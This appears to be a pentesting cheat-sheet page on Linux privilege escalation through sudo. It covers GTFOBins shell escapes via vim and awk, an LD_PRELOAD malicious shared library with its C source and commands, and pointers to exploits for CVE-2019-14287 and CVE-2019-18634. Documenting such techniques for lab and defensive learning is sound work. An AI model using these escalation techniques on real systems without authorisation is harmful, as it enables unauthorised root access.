> For the complete documentation index, see [llms.txt](https://csbygb.gitbook.io/pentips/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://csbygb.gitbook.io/pentips/linux/privesc/sudo.md).

# Sudo

## Sudo Shell Escaping

* `sudo -l` will show us commands delegated to our user. See example of possible output below\
  ![image](https://user-images.githubusercontent.com/96747355/167295677-4b615420-f012-4bb7-992c-b03ab924f8b8.png)
* With the result of the command we can then check out on [GTFOBins](https://gtfobins.github.io/) for comprehensive ways to escalate

### Vim

* [Vim on Gtfobins](https://gtfobins.github.io/gtfobins/vim/) the section of interest for us here is the following one:\
  ![image](https://user-images.githubusercontent.com/96747355/167295801-e9cab3c9-62e5-4a46-90f3-ff62498f4e57.png)
* Let's try this command `sudo vim -c ':!/bin/sh'`
* It works right away\
  ![image](https://user-images.githubusercontent.com/96747355/167295851-cd5dd86e-3dc6-49b3-9c32-6846a32f857d.png)

### awk

* [Awk on GTFOBins](https://gtfobins.github.io/gtfobins/awk/) the section of interest for us here is the following one:\
  ![image](https://user-images.githubusercontent.com/96747355/167295996-a55b8fce-b27f-421a-958a-18646b7c828d.png)
* So let's try this `sudo awk 'BEGIN {system("/bin/sh")}'`
* It works\
  ![image](https://user-images.githubusercontent.com/96747355/167296030-dd82bef4-4640-4ded-8357-0b2f32ca9638.png)

## Intended Functionality

### Example with Apache2

* `sudo -l` we should see this: `(root) NOPASSWD: /usr/sbin/apache2`
* *Note: There are no entry on GTFOBins about apache2 but Google can do the trick ;) We could type something like "sudo apache2 privilege escalation"*
* Then we find an [article](https://touhidshaikh.com/blog/2018/04/abusing-sudo-linux-privilege-escalation/) that mentions this command to let us view system files.

### Example with wget

* See [here](https://veteransec.org/hack-the-box-sunday-walkthrough/) an example with wget on veteransec's writeup of the HTB box called sunday.

## LD\_PRELOAD

* `sudo -l` we should see something like this `env_keep+=LD_PRELOAD`
* We are going to preload a user specific share library before any other share libraries
* We need to write our malicious library that will privesc for us by changing our gid and uid to 0 (root). We put this code in a file named x.c

```
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
    unsetenv("LD_PRELOAD");
    setgid(0);
    setuid(0);
    system("/bin/bash");
}
```

* now we need to compile our library with gcc `gcc -fPIC -shared -o /tmp/x.so x.c -nostartfiles`
* And now we need to set it as our user's preloaded library `sudo LD_PRELOAD=/tmp/x.so apache2`
* We should be root\
  ![image](https://user-images.githubusercontent.com/96747355/167297390-ce9c76ed-72c5-4bfb-bea9-9b380478cb9d.png)

## CVE-2019-14287

* [CVE-2019-14287 on exploit-db](https://www.exploit-db.com/exploits/47502)
* This vulnerability allows us to change our user id, we need to have some sudo rights delegated to us this works very well with right on `/bin/bash`
* Checkout [here](/pentips/writeups/thmwriteups/thm-sudosecuritybypass.md) a writeup of an example of exploitation

## CVE-2019-18634

* [CVE-2019-18634 exploit by saleemrashid](https://github.com/saleemrashid/sudo-cve-2019-18634)
* This one is a buffer overflow
* If we see that we have password feedback on (we can try any sudo command to check for this), it means that the option `pwfeedback` is turned on in `/etc/sudoers` and that makes it vulnerable to buffer overflow
* We basically just need to run the provided exploit. Pour pratice on this check out [this box](https://tryhackme.com/room/sudovulnsbof) on trhyhackme

## Resources

{% embed url="<https://academy.tcm-sec.com/p/linux-privilege-escalation>" %}
Linux Privesc on TCM-Security Academy
{% endembed %}


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://csbygb.gitbook.io/pentips/linux/privesc/sudo.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.